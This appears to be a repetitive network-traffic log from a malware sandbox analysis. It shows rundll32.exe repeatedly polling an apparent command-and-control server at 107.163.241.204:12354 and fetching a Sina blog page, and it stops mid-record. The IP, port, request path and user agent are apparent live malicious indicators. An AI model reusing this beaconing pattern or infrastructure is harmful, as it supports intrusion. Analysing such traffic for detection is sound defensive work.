                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:10.395332098 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      25 | 192.168.2.9 | 49979 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:12.511389971 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      26 | 192.168.2.9 | 49983 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:12.745274067 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      27 | 192.168.2.9 | 50000 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:14.301184893 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      28 | 192.168.2.9 | 50002 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:14.417965889 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      29 | 192.168.2.9 | 50003 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:14.466578007 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:16.057897091 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:15 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      30 | 192.168.2.9 | 50028 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:16.547029018 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      31 | 192.168.2.9 | 50032 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:16.778321028 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      32 | 192.168.2.9 | 50048 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:18.315104961 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      33 | 192.168.2.9 | 50050 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:18.452539921 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      34 | 192.168.2.9 | 50051 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:18.452672005 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:20.017344952 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:19 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      35 | 192.168.2.9 | 50077 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:20.594185114 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      36 | 192.168.2.9 | 50080 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:20.703990936 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      37 | 192.168.2.9 | 50100 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:22.356342077 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      38 | 192.168.2.9 | 50102 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:22.471931934 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      39 | 192.168.2.9 | 50103 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:22.472050905 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:24.055720091 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:23 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      40 | 192.168.2.9 | 50127 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:24.615520000 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      41 | 192.168.2.9 | 50130 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:24.783198118 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      42 | 192.168.2.9 | 50150 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:26.361162901 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      43 | 192.168.2.9 | 50152 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:26.471364975 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      44 | 192.168.2.9 | 50153 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:26.471508026 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:28.046827078 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:27 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      45 | 192.168.2.9 | 50177 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:28.697782040 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      46 | 192.168.2.9 | 50180 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:28.773125887 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      47 | 192.168.2.9 | 50200 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:30.373579025 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      48 | 192.168.2.9 | 50203 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:30.487062931 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:32.061713934 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:31 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      49 | 192.168.2.9 | 50204 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:30.487552881 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      50 | 192.168.2.9 | 50233 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:32.612746000 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      51 | 192.168.2.9 | 50236 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:32.730777979 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      52 | 192.168.2.9 | 50255 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:34.380562067 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      53 | 192.168.2.9 | 50257 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:34.486502886 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      54 | 192.168.2.9 | 50258 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:34.486591101 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:36.063488960 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:35 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      55 | 192.168.2.9 | 50289 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:36.604049921 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      56 | 192.168.2.9 | 50292 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:36.737837076 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      57 | 192.168.2.9 | 50317 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:38.392302036 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      58 | 192.168.2.9 | 50319 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:38.510656118 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      59 | 192.168.2.9 | 50320 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:38.512219906 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      60 | 192.168.2.9 | 50354 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:40.637304068 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      61 | 192.168.2.9 | 50356 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:40.786845922 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      62 | 192.168.2.9 | 50382 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:42.404793024 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      63 | 192.168.2.9 | 50385 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:42.520065069 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      64 | 192.168.2.9 | 50386 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:42.520148993 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:44.655164957 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:44 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      65 | 192.168.2.9 | 50414 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:44.650203943 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      66 | 192.168.2.9 | 50416 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:44.764868021 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      67 | 192.168.2.9 | 50446 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:46.441603899 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      68 | 192.168.2.9 | 50450 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:46.581362963 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      69 | 192.168.2.9 | 50451 | 202.108.0.52 | 80 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:46.582151890 CET | 118 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:48.143218040 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:47 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      70 | 192.168.2.9 | 50483 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 11, 2024 16:24:48.655706882 CET | 184 | OUT | GET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      71 | 192.168.2.9 | 50487 | 107.163.241.204 | 12354 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
